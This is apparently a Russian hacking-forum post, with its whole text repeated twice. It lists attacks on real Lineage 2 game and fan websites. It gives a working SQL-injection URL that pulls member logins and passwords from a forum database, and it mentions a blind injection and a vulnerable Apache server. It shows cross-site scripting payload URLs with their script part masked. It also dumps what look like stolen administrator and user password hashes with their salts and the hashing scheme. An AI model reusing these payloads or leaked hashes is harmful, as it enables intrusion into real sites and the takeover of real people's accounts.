Hummel
22.11.2008, 19:01
Элмор
_elmore.ru/base/?info=Drop&id=177+union+select+concat(member_login _key,char(5 8),name,char(58),legacy_password%20%20),2,3,4,5,6+ from+ibf_members+WHERE+id=1/*
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Вот еще рабочая блинд-инъекция, но таблицы ibf_members там нифига нету. - Elsir
Corund:31ff773953c8c8e9865bb41cecdf4725:9`7Pu
DarkCyber:20e653db64502c8b294d38e11b5a1a18:=_M:$
md5(md5($pass).md5($salt))
Хэши ппц крепкие + странная база форума какая-то, дальше id=4 ( группа привилегированных пользователей) скуль не идет.
_l2online
e88a10000d355195e2e7228724b29d7e:-PJQyF
2b7062a2badf5da2be52d9c107ce78f7:{V3NO
md5(md5($pass).md5($salt))
Опять таки крепкие хэши(навождение просто)
_l2server
_l2server.ру/events.php?id=64&p=0">*****************/Popins/)</script>
_l2server.ру/status/top100/?server=c3-x10">*****************/Popins/)</script>
+ Уязвимый локально Апач
_la2online.ру/forum/index.php
первый админ:
bd8612fbd9240e8f7b88c0febc92dcc8:j#BdI
Второй админ
4d112e6784f24438cf2281dd00a32941:jRGhK
_elmore.ru/base/?info=Drop&id=177+union+select+concat(member_login _key,char(5 8),name,char(58),legacy_password%20%20),2,3,4,5,6+ from+ibf_members+WHERE+id=1/*
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Вот еще рабочая блинд-инъекция, но таблицы ibf_members там нифига нету. - Elsir
Corund:31ff773953c8c8e9865bb41cecdf4725:9`7Pu
DarkCyber:20e653db64502c8b294d38e11b5a1a18:=_M:$
md5(md5($pass).md5($salt))
Хэши ппц крепкие + странная база форума какая-то, дальше id=4 ( группа привилегированных пользователей) скуль не идет.
_l2online
e88a10000d355195e2e7228724b29d7e:-PJQyF
2b7062a2badf5da2be52d9c107ce78f7:{V3NO
md5(md5($pass).md5($salt))
Опять таки крепкие хэши(навождение просто)
_l2server
_l2server.ру/events.php?id=64&p=0">*****************/Popins/)</script>
_l2server.ру/status/top100/?server=c3-x10">*****************/Popins/)</script>
+ Уязвимый локально Апач
_la2online.ру/forum/index.php
первый админ:
bd8612fbd9240e8f7b88c0febc92dcc8:j#BdI
Второй админ
4d112e6784f24438cf2281dd00a32941:jRGhK